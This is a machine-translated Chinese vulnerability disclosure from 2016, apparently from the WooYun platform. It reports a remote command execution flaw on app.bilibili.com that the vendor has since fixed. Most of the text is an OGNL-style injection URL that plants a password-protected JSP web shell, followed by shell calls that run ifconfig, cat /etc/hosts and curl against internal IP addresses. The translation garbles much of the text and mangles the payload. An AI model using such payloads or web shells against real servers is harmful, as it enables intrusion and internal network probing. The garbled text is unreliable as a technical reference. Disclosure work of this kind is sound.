漏洞标题 Artifact只有bilibili一个站命令执行shell 相关制造商 Bilibili.com 漏洞作者 过路人 提交时间 2016-06-27 13: 01 公共时间 2016-06-27 17: 59 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 制造商已修复 标签标签 远程命令执行 漏洞详细信息 http://app.bilibili.com/bangumi/getVersion.ver?method: [email protected]/* @ [email protected]/* [email protected]/* [email protected]/* [email protected]/*。[email protected]/* [email protected]/* [email protected]/* g& q=com.opensymphony.xwork2.dispatcher.HttpServletRequest& r=com.opensymphony.xwork2.dispatcher.HttpServletResponse& q=/&安培; G=%3 C-&安培; G= - %3E&安培; U=%7C - > | /数据/应用/bangumi_server/bangumi/|< - 通过了一个shell http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=ifconfig
http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.16 我可以简单地检测内联网,恐怕你会反侵,我不会搞。 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.21 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=cat/etc/hosts ***** alhost ***** ***** 222D ***** ********** 我想要的***** ***** ***** - localhost ***** ***** P6-人***** ***** - ***** allro *****机器人。***** ***** i.bilib ***** ***** unt.bili ***** ***** w.bilib ***** ***** ngzi.bili ***** *****。app.bili ***** ***** app.bil ***** ***** i.bilib ***** ***** en.bili ***** ***** angumi.bi ***** 总共执行了几个订单,请自行检查系统日志。上传 漏洞证明: 修理计划: 补丁,挂起并保存脚踢开发。 版权声明:请注明出处。居民A @乌云